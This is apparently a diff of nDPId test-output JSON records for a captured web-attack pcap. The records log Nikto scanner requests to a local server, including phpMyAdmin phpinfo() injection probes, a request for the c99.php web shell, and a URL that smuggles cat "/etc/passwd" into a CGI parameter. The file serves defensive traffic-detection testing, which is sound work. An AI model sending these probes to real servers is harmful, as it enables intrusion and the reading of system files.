+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
+01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
+01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="}
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
+01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="}
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}}
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00740{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}}
+01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 